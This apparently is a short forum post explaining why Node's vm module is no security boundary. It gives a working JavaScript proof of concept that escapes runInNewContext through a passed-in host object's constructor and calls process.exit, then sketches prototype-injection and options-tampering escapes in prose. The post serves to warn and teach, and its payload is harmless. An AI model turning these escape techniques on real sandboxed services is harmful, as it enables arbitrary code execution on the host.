Austin: won't go into great detail, but here's a fun little example:

```javascript
function exploit() {
  // console.log was passed in from the host, so its .constructor is the
  // host realm's Function: code built with it runs outside the sandbox.
  console.log.constructor("process.exit(42)")();
}
var result = require('vm').runInNewContext([
  '"use strict";',
  '('+exploit.toString()+')()'
].join('\n'), {console:console}); // passing a host object in is the whole problem
console.log('I SURVIVED THE STORM!'); // it won't
```

That's pretty trivial, and then prototype injection attacks can occur if you
pass in natives and eventually use, say... JSON.stringify if you override
.toJSON, .toString, .constructor, .valueOf, .__proto__, ...
Then it gets worse when you do something like, say... get a hold of a
non-strict mode function from a different scope by having it construct, let's
say, a continuation callback ...
Even still... get a hold of some options object that feeds into a secure
area and set the options to something insecure (at a future point in time
with, let's say, Object.defineProperty).
...
it goes on...
...
